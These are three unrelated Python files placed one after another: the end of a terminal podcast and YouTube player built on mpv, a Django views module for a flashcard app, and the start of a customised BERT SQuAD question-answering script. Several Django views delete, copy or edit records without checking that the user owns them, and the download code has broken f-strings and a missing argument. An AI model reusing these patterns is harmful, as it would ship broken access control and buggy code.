except AlarmException:
pass
signal.signal(signal.SIGALRM, signal.SIG_IGN)
return default
def getpodcast(podcastfile: str, songs:bool) -> None:
"""Get Podcast."""
# print list of podcasts
print(f"Reading from File: {podcastfile}")
get = True
while get:
podlist = configparser.ConfigParser()
podlist.read(podcastfile)
podchoice = random.choice(list(podlist))
if podchoice == "DEFAULT":
continue
if songs:
if ("songs" in podlist[podchoice].keys()) \
and (str(podlist[podchoice]['songs']).upper()== 'TRUE'):
get = process_podcast(podlist[podchoice])
else:
continue
get = process_podcast(podlist[podchoice])
def process_podcast(podchoice):
"""Process Podcast."""
# if --podcast is used we will only process a matching name
pod = podchoice["title"]
url = podchoice["url"]
lastcount = None
firstcount = None
youtubelink = False
print(pod, url)
if "lastcount" in podchoice.keys():
lastcount = int(podchoice["lastcount"])
if "firstcount" in podchoice.keys():
firstcount = int(podchoice["firstcount"])
if "youtubelink" in podchoice.keys():
youtubelink = str(podchoice['youtubelink']).upper()
if youtubelink == 'TRUE':
print("Youtube Playlist: ", pod)
ytvideolist = check_output(
["youtube-dl", "--get-id", "--flat-playlist", url],
).split()
ytvideo = random.choice(ytvideolist[firstcount:lastcount])
title = check_output(
[
"youtube-dl",
"--get-title",
f"https://www.youtube.com/watch?v={ytvideo.decode()}",
],
)
description = check_output(
[
"youtube-dl",
"--get-description",
f"https://www.youtube.com/watch?v={ytvideo.decode()}",
],
)
print("Video Title: ", title.decode())
print("Video Description: ", description.decode())
if check_history(pod, title.decode()):
print("Skipping Because Played Recently")
return True
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
"--ytdl",
f"https://www.youtube.com/watch?v={ytvideo.decode()}",
],
)
write_history(pod, title.decode())
return True
if url[:4] == "file":
newfilename = url[6:]
if check_history(pod, "Local File"):
print("Skipping Because Played Recently")
return True
ans = TimedInput(prompt="Play local copy ? (Y/n) Defaulting in:", default="Y")
if not ans == "n":
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
newfilename,
],
)
write_history(pod, "Local File")
return True
if url[:4] == "http":
try:
request = urllib.request.Request(url, headers=headers)
content = urllib.request.urlopen(request)
podcast = Podcast(content.read())
except (urllib.error.HTTPError, urllib.error.URLError) as err:
print(f"Podcast: {pod}")
print(f"Connection error: {err}")
return # continue
while True:
item = random.choice(podcast.items[firstcount:lastcount])
if not item.enclosure_type:
print(item.title, ":", item.link)
print("Not Playing, No links available")
return True
try:
finish_playing = process_podcast_item(pod, item)
if finish_playing:
return True
return False
except SkipPodcast:
return True
print("Weird URL in File", url)
exit()
class SkipPodcast(Exception):
"""Skipping if the podcast isn't found."""
pass
def process_podcast_item(pod: str, item: dict):
"""Process a single item from pod."""
# skip if date is older then --date-from
data = {
"podcast": pod,
"date": item.date_time.strftime("%d.%m.%Y"),
"title": getSafeFilenameFromText(item.title.strip(" .")), # scrub title
"year": str(item.date_time.year),
"ext": parseFileExtensionFromUrl(item.enclosure_url)
or mimetypes.guess_extension(item.enclosure_type),
}
newfilelength = 0
newfilemtime = item.time_published
newfilename = DOWNLOADDIR + f"{pod}/{data['title']}_{data['date']}{data['ext']}"
print(f"Podcast Series: {pod}")
print(f"Episode Title: {data['title']}")
print(f"Date: {data['date']}")
if item.description:
print("Description:")
print_formatted_text(HTML(bs4.BeautifulSoup(item.description, "html.parser")))
ans = TimedInput(prompt="Try Streaming ? (Y/n/[s]kip) Defaulting in:", default="Y")
if ans == "s":
return True
if not ans == "n":
if check_history(pod, data["title"]):
print("Skipping Because Played Recently")
return True
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
item.enclosure_url,
],
)
write_history(pod, data["title"])
return True
# if file exist we check if filesize match with content length...
print(f"File: {newfilename}:")
if os.path.isfile(newfilename):
newfilelength = os.path.getsize(newfilename)
try:
validateFile(
newfilename,
item.time_published,
item.enclosure_length,
item.enclosure_url,
)
except (urllib.error.HTTPError, urllib.error.URLError):
print("Connection when verifying existing file")
return # continue
except socket.timeout:
print("Connection timeout when downloading file")
return # continue
# download or resume podcast. retry if timeout. cancel if error
cancel_validate, newfilelength = try_download_item(
newfilelength, newfilename, item,
)
if cancel_validate:
return # continue
# validate downloaded file
try:
if validateFile(newfilename, 0, item.enclosure_length, item.enclosure_url):
# set mtime if validated
os.utime(newfilename, (newfilemtime, newfilemtime))
print("File validated")
elif newfilelength:
# did not validate. see if we got same size as last time we
# downloaded this file
if newfilelength == os.path.getsize(newfilename):
# ok, size is same. maybe data from response and rss is wrong.
os.utime(newfilename, (newfilemtime, newfilemtime))
print("File is assumed to be ok.")
except urllib.error.HTTPError:
print("Connection error when verifying download")
return # continue
except socket.timeout:
print("Connection timeout when downloading file")
return # continue
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
newfilename,
],
)
return True
def try_download_item(newfilelength, newfilename, item):
"""Try downloading item."""
# download or resume podcast. retry if timeout. cancel if error
retry_downloading = True
while retry_downloading:
retry_downloading = False
cancel_validate = False
try:
if newfilelength:
resumeDownloadFile(newfilename, item.enclosure_url)
else:
downloadFile(newfilename, item.enclosure_url)
except (urllib.error.HTTPError, urllib.error.URLError):
print("Connection error when downloading file")
cancel_validate = True
except socket.timeout:
if newfilelength:
if os.path.getsize(newfilename) > newfilelength:
print("Connection timeout. File partly resumed. Retrying")
retry_downloading = True
newfilelength = os.path.getsize(newfilename)
else:
print("Connection timeout when resuming file")
cancel_validate = True
else:
if os.path.isfile(newfilename):
newfilelength = os.path.getsize(newfilename)
if newfilelength > 0:
print("Connection timeout. File partly downloaded. Retrying")
retry_downloading = True
else:
print("Connection timeout when downloading file")
cancel_validate = True
else:
print("Connection timeout when downloading file")
cancel_validate = True
return cancel_validate, newfilelength
def downloadFile(newfilename: str, enclosure_url: str) -> None:
"""Download File."""
# create download dir path if it does not exist
if not os.path.isdir(os.path.dirname(newfilename)):
os.makedirs(os.path.dirname(newfilename))
# download podcast
print("Downloading ...")
r = requests.get(enclosure_url, stream=True)
# Total size in bytes.
total_size = int(r.headers.get("content-length", 0))
block_size = 1024 # 1 Kibibyte
with tqdm.tqdm(total=total_size, unit="iB", unit_scale=True) as t:
with open(newfilename, "wb") as out_file:
for data in r.iter_content(block_size):
t.update(len(data))
out_file.write(data)
if total_size != 0 and t.n != total_size:
print("ERROR, something went wrong")
"""
request = urllib.request.Request(enclosure_url)
with urllib.request.urlopen(request, timeout=30) as response:
total_size = int(response.info()["Content-Length"])
block_size = 1024 # 1 Kibibyte
with open(newfilename, "wb") as out_file:
shutil.copyfileobj(response, out_file, 100 * 1024)
"""
print("Download complete")
def resumeDownloadFile(newfilename: str, enclosure_url: str, headers: dict) -> None:
"""Resume file download."""
# find start-bye and total byte-length
print("Prepare resume")
request = urllib.request.Request(enclosure_url, headers=headers)
with urllib.request.urlopen(request) as response:
info = response.info()
if "Content-Length" in info:
contentlength = int(info["Content-Length"])
else:
contentlength = -1
if os.path.isfile(newfilename):
start_byte = os.path.getsize(newfilename)
else:
start_byte = 0
request = urllib.request.Request(enclosure_url, headers=headers)
if start_byte > 0:
if start_byte >= contentlength:
print("Resume not possible. (startbyte greater then contentlength)")
return
request.add_header("Range", "bytes={start_byte}-")
with urllib.request.urlopen(request, timeout=30) as response:
with open(newfilename, "ab+") as out_file:
info = response.info()
out_file.seek(start_byte)
if "Content-Range" in info:
contentrange = info["Content-Range"].split(" ")[1].split("-")[0]
if not int(contentrange) == start_byte:
print("Resume not possible. Cannot resume from byte {start_byte}")
return
if not out_file.tell() == start_byte:
print("Resume not possible. Cannot append data from byte {start_byte}")
return
print("Start resume from byte {start_byte}")
print("Downloading ...")
shutil.copyfileobj(response, out_file, 100 * 1024)
print("Resume complete")
def validateFile(
newfilename: str, time_published: int, enclosure_length: int, enclosure_url: str,
) -> bool:
"""Validate File."""
if os.path.isfile(newfilename + ".err"):
return True # skip file
# try to validate size
filelength = os.path.getsize(newfilename)
if enclosure_length:
if abs(filelength - enclosure_length) <= 1:
return True
else:
enclosure_length = 0
request = urllib.request.Request(enclosure_url)
with urllib.request.urlopen(request) as response:
info = response.info()
if "Content-MD5" in info:
print(f"Content-MD5:{info['Content-MD5']}")
if "Content-Length" in info:
contentlength = int(info["Content-Length"])
if abs(filelength - contentlength) <= 1:
return True
elif filelength > contentlength:
return True
print(
"Filelength and content-length mismatch."
f"filelength:{filelength}"
f"enclosurelength:{enclosure_length}"
f" contentlength:{int(info.get('Content-Length', '0'))}",
)
# if size validation fail, try to validate mtime.
if time_published:
filemtime = parseUnixTimeToDatetime(os.path.getmtime(newfilename))
time_published = parseUnixTimeToDatetime(time_published)
if time_published == filemtime:
return True
if "Last-Modified" in info:
last_modified = parseRftTimeToDatetime(info["Last-Modified"])
if last_modified == filemtime:
return True
else:
last_modified = ""
print(
f"Last-Modified mismatch."
f" file-mtime:{filemtime}"
f" Last-Modified:{last_modified}"
f" pubdate:{time_published}",
)
return False
def getSafeFilenameFromText(text):
"""Get safe filename from text."""
# remove reserved windows keywords
reserved_win_keywords = r"(PRN|AUX|CLOCK\$|NUL|CON|COM[1-9]|LPT[1-9])"
# remove reserved windows characters
reserved_win_chars = '[\x00-\x1f\\\\?*:";|/<>]'
# reserved posix is included in reserved_win_chars. reserved_posix_characters= '/\0'
extra_chars = "[$@{}]"
tmp = re.sub(
"|".join((reserved_win_keywords, reserved_win_chars, extra_chars)), "", text,
)
return tmp
def parseFileExtensionFromUrl(enclosure_url):
"""File Extension Finder."""
return os.path.splitext(enclosure_url)[1].split("?")[0].lower()
def parseRftTimeToDatetime(datetimestr: str) -> datetime.datetime:
"""Rft time to Date Time."""
return email.utils.parsedate_to_datetime(datetimestr)
def parseUnixTimeToDatetime(datetimestamp: int) -> datetime.datetime:
"""Unix time to date time."""
return datetime.datetime.fromtimestamp(datetimestamp)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Podcaster")
parser.add_argument(
"-f", "--podcastfile", type=str, help="podcast file location", default=PODFILE,
)
parser.add_argument(
"--songs", help="song mode", action='store_true',
)
args = parser.parse_args()
podcastfilepath = os.path.abspath(os.path.expanduser(args.podcastfile))
if args.songs:
print("Executing in songs mode")
try:
getpodcast(podcastfilepath, args.songs)
except KeyboardInterrupt:
signal.alarm(0)
print("\nExiting..")
exit()
|
views.py
|
from django.http import HttpResponse
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib.auth.decorators import login_required
from .forms import FolderForm, CardsForm
from .multithreads import *
from threading import Thread
from .models import CardFolder, MultiCard
@login_required
def home(request):
return redirect('/')
def demo_welcome(request):
form = FolderForm(request.POST or None)
context = {
"folder_form": form
}
return render(request, 'Cards/demo/welcome.html', context)
# region Folder
@login_required
def delete_folder(request, set_id):
if request.method == 'POST':
folder = CardFolder.objects.get(id=set_id)
folder.delete()
return redirect('/')
else:
return redirect('/')
@login_required
def add_folder(request):
form = FolderForm(request.POST or None)
if form.is_valid():
if request.method == "POST":
folder = CardFolder.objects.create(user=request.user, **form.cleaned_data)
enough = len(folder.multicard_set.all()) > 2
return render(request, 'Cards/view_set.html', {'folder': folder, 'enough': enough})
context = {
"form": form
}
return render(request, 'Cards/add_set.html', context)
@login_required
def edit_folder(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
if folder.being_edited:
return render(request, 'Cards/folder_being_updated.html', {'folder': folder})
if request.method == 'POST':
form = FolderForm(request.POST or None, instance=folder)
if form.is_valid():
folder = form.save(commit=False)
folder.being_edited = True
folder.save()
t = Thread(target=edit_folder_translate, args=[folder])
t.setDaemon(False)
t.start()
enough = len(folder.multicard_set.all()) > 2
return render(request, 'Cards/view_set.html', {'folder': folder, 'enough': enough})
else:
form = FolderForm(instance=folder)
return render(request, 'Cards/edit_set.html', {'form': form, 'folder': folder})
@login_required
def copy_folder(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if request.method == 'POST':
form = FolderForm(request.POST or None, instance=folder)
if form.is_valid():
new_folder = CardFolder.objects.get(id=set_id)
new_folder.pk = None
new_folder.id = None
new_folder.user = request.user
new_folder.public = False
new_folder.save()
for multicard in folder.multicard_set.all():
new_multicard = MultiCard.objects.get(id=multicard.id)
new_multicard.id = None
new_multicard.pk = None
new_multicard.mastered = False
new_multicard.score = 0
new_multicard.priority = 0
new_multicard.cards_folder = new_folder
new_multicard.save()
for card in multicard.card_set.all():
new_card = card
new_card.pk = None
new_card.id = None
new_card.mastered = False
new_card.score = 0
new_card.priority = 0
new_card.multi_card = new_multicard
new_card.cards_folder = new_folder
new_card.save()
form = FolderForm(request.POST or None, instance=new_folder)
new_folder = form.save(commit=False)
new_folder.being_edited = True
new_folder.save()
t = Thread(target=edit_folder_translate, args=[new_folder])
t.setDaemon(False)
t.start()
# return redirect('Cards/view_set.html', {'folder': new_folder})
return redirect(f'/cards/view_set/{new_folder.id}/')
else:
form = FolderForm(instance=folder)
return render(request, 'Cards/copy_set.html', {'form': form})
@login_required
def view_folder(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
enough = len(folder.multicard_set.all()) > 2
for card in folder.card_set.all():
if card.pronunciation == 'False' or (card.pronunciation == card.main):
card.pronunciation = ''
card.save()
if folder.user != request.user:
return redirect('/no_access/')
return render(request, 'Cards/view_set.html', {'folder': folder, 'enough': enough})
@login_required
def reset_progress(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
MultiCard.objects.filter(cards_folder=folder).update(priority=10, score=0)
Card.objects.filter(cards_folder=folder).update(priority=1, score=0)
return redirect(request.META['HTTP_REFERER'])
# endregion
# region MultiCards
@login_required
def add_multicard(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
langs = folder.get_langs(item='key')
form = CardsForm(request.POST or None)
context = {
"form": form,
'folder': folder,
"length": len(langs),
"langs": folder.get_langs(),
}
if request.method == "POST":
if request.POST['main' + langs[0]]:
m_card = MultiCard.objects.create(cards_folder=folder, comment=request.POST['comment'],
definition=request.POST['definition'])
m_card.save()
t = Thread(target=add_multicard_translate, args=[langs, request, m_card, folder])
t.setDaemon(False)
t.start()
# return redirect(f'/cards/add_multicard/{folder.id}/')
return redirect(f'/cards/view_set/{folder.id}/')
return render(request, 'Cards/add_multicard.html', context)
@login_required
def add_many(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
langs = folder.get_langs()
length = len(langs)
form = CardsForm(request.POST or None)
context = {
"form": form,
'folder': folder,
"length": length,
"langs": langs,
}
if request.method == "POST":
separator = str(request.POST['separator'])
language = str(request.POST['language'])
for_translate = request.POST['for_translate']
# If user messes with the validations (all below three are required).
if not language or not for_translate:
return redirect('/no_access/')
if not separator:
separator = " "
new_cards = for_translate.split(separator)
new_langs = folder.get_langs(item='key')
# Get all the languages except the source.
new_langs.remove(language)
for word in new_cards:
if word == "" or word == " ":
continue
word = word.strip(" , ")
m_card = MultiCard.objects.create(cards_folder=folder)
m_card.save()
word = word.capitalize()
Card.objects.create(multi_card=m_card, cards_folder=folder, language=language, main=word, synonyms="",
comment="", pronunciation="")
t = Thread(target=add_many_translate, args=[new_langs, word, language, m_card, folder])
t.setDaemon(False)
t.start()
return redirect(f'/cards/view_set/{folder.id}/')
return render(request, 'Cards/add_many.html', context)
@login_required
def edit_multicards(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
langs = folder.get_langs()
length = len(langs)
context = {
# "form": form,
'folder': folder,
"length": length,
"langs": langs,
'width': 94 / length
}
return render(request, 'Cards/edit_multicards.html', context)
@login_required
def edit_multicards_save(request, set_id, m_card_id):
if request.method == "POST":
folder = get_object_or_404(CardFolder, id=set_id)
langs = folder.get_langs()
m_card = get_object_or_404(MultiCard, id=m_card_id)
m_id = str(m_card.id)
m_card.definition = request.POST['definition' + m_id]
m_card.comment = request.POST['comment' + m_id]
m_card.save()
for k, v in langs:
card = Card.objects.get(multi_card=m_card, language=k)
if request.POST['main' + k + m_id] != card.main:
card.automated = False
card.main = request.POST['main' + k + m_id].capitalize()
card.pronunciation = request.POST['pronunciation' + k + m_id].capitalize()
card.synonyms = request.POST['synonyms' + k + m_id].capitalize()
card.comment = request.POST['comment' + k + m_id]
card.save()
return HttpResponse(status=204)
else:
return redirect('/no_access/')
@login_required
def edit_all_multicards(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
user_folders = request.user.cardfolder_set.all()
langs = folder.get_langs()
length = len(langs)
context = {
'folder': folder,
"length": length,
"langs": langs,
'width': 94 / length
}
if request.method == "POST":
# m_card = get_object_or_404(MultiCard, id=m_card_id)
for m_card in folder.multicard_set.all():
m_id = str(m_card.id)
if request.POST.get(('delete' + m_id), False):
m_card.delete()
else:
m_card.definition = request.POST['definition' + m_id]
m_card.comment = request.POST['comment' + m_id]
m_card.save()
for k, v in langs:
card = Card.objects.get(multi_card=m_card, language=k)
if request.POST['main' + k + m_id] != card.main:
card.automated = False
card.main = request.POST['main' + k + m_id].capitalize()
card.pronunciation = request.POST['pronunciation' + k + m_id].capitalize()
card.synonyms = request.POST['synonyms' + k + m_id].capitalize()
card.comment = request.POST['comment' + k + m_id]
card.save()
return render(request, 'Cards/edit_all_multicards.html', context)
else:
if folder not in user_folders:
return redirect('/no_access/')
else:
return render(request, 'Cards/edit_all_multicards.html', context)
@login_required
def delete_multicards(request, set_id, m_card_id):
if request.method == "POST":
m_card = get_object_or_404(MultiCard, id=m_card_id)
m_card.delete()
folder = get_object_or_404(CardFolder, id=set_id)
langs = folder.get_langs()
length = len(langs)
context = {
'folder': folder,
"length": length,
"langs": langs,
'width': 94 / length
}
return render(request, 'Cards/edit_multicards.html', context)
else:
return redirect('/no_access/')
# endregion
# region Public
@login_required
def make_public(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
if folder.public:
folder.public = False
else:
folder.public = True
folder.save()
return redirect(request.META['HTTP_REFERER'])
@login_required
def view_folder_public(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
return render(request, 'Cards/view_set_public.html', {'folder': folder})
@login_required
def public_sets(request):
folders = CardFolder.objects.filter(public=True)
return render(request, 'Cards/public_sets.html', {'folders': folders})
# endregion
# region Other
@login_required
def refresh_update(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
clean_errors(folder)
updates = MultiCard.objects.filter(being_edited=True, cards_folder=folder)
if updates or folder.being_edited:
return render(request, 'Cards/folder_being_updated.html', {'folder': folder})
else:
return edit_folder(request, folder.id)
@login_required
def repair_translations(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
clean_errors(folder)
t = Thread(target=repair_translations_thread, args=[folder])
t.setDaemon(False)
t.start()
# TODO add message that translations are in work
return redirect(f'/cards/view_set/{folder.id}/')
# endregion
# TODO If words are too long they need to be wrapped. Otherwise they are breaking the tables.
# TODO count folders by occurrence in that user folders
# TODO [learn_write.html] add auto-focus and ability to go next on enter even if no input required
# TODO [learn_write.html] add comments, hints, message-at least 2 cards are required
|
run_squad_ColabTCPTrans_quicktest_20191113.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os, types
import random
import modeling
import optimization
import tokenization
import six
import copy
import tensorflow as tf
import numpy as np
import scipy.sparse as sp
# do excel
from openpyxl import Workbook
import uuid
# do
import code
import prettytable
from decimal import *
import decimal
getcontext().prec = 50
#Willy Define
example_in_set_eval_examples = 0
example_in_write_predictions = 0
predict_result_index = 0
checkState_in_AtenResult = 0
checkState_in_AtenResult2 = 0
checkState_in_GetAnswer = 0
checkState_add_retriever = 0
FollowInitTPU = 1
willy_check_code = "willy test on 201911171804"
Disconnect_KEYWORD = 'Aten Colab Disconect'
from drqa import retriever
DOC2IDX = None
documents = []
#db_class = retriever.get_class('sqlite')
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
flags.DEFINE_string(
"predict_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPido_interactiveece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
"If null_score - best_non_null is greater than the threshold predict null.")
flags.DEFINE_bool(
"do_retriever", False,
"If True, use retriever to help reader to filte good doc - add by willy.")
flags.DEFINE_string(
"retriever_model", None,
"retriever model path - add by willy.")
flags.DEFINE_float(
"retriever_weight", 0.0,
"retriever weight - add by willy.")
flags.DEFINE_integer("retriever_ranker", 1,"Rank with retriever.")
flags.DEFINE_string("document_type","SQuAD", "There are three document types: (1)paragraphs in SQuAD (2)SQlite (DataBase) (3) Text - add by willy." )
flags.DEFINE_string("question_type","SQuAD", "There are three question types: (1) SQuAD (2)one_question (3) interactive." )
flags.DEFINE_string("question", None, "give question to predict - Willy Test.")
flags.DEFINE_string("db_file", None, "give path with data base file to set SQlite State - Willy Test.")
flags.DEFINE_string("question_table", None, "set table path - Willy Test.")
flags.DEFINE_string("excel_name", None ,"set excel name -Willy Test.")
flags.DEFINE_integer("show_all_choice", 0, "show all choice-Willy Test.")
flags.DEFINE_float(
"choice_score", 0.15,
"choice score. - add by willy.")
flags.DEFINE_float(
"threshold_prob_ans_merge", 0.5,
"threshold prob ans_merge - add by willy.")
flags.DEFINE_string("Host_TCPServer", '127.0.0.1' ,"Set TCP Host-Willy Test.")
flags.DEFINE_integer("PORT_TCPServer", 1234, "Set TCP Port-Willy Test.")
flags.DEFINE_bool("Save_PB_Model", False, "Save PB File.")
flags.DEFINE_string("EXPORT_PATH", None, "Path of export path.")
ranker = None
class DecimalEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, decimal.Decimal):
return float(obj)
return super(DecimalEncoder, self).default(obj)
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_id, #willy add
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_id = doc_id #willy add
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_id:[%s]" % (tokenization.printable_text(self.doc_id)) #willy add
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.start_position:
s += ", end_position: %d" % (self.end_position)
if self.start_position:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def TakeThird(val):
return val[2]
def set_squad_examples(input_file,question):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
file = open("Output1.txt", "r")
document = file.read()
file.close()
paragraphs = document.split('\n')
paragraphs = list(filter(None, paragraphs))
#-----------------------------------------------
doc_tokensList = []
for i , paragraph_text in enumerate(paragraphs):
# paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
doc_tokensList.append(doc_tokens)
#-----------------------------------------------
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for i, doc_tokens in enumerate(doc_tokensList):
example = SquadExample(
qas_id=str(uuid.uuid1()),
question_text=question,
doc_id=DOC2IDX[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
'''
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
#qas_id = qa["id"]
# uuid reset by willy in 20190313
qas_id = str(uuid.uuid1())
question_text = qa["question"]
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for doc_tokens in doc_tokensList:
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
print(example)
examples.append(example)
'''
#-----------------------------------------------
return examples
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
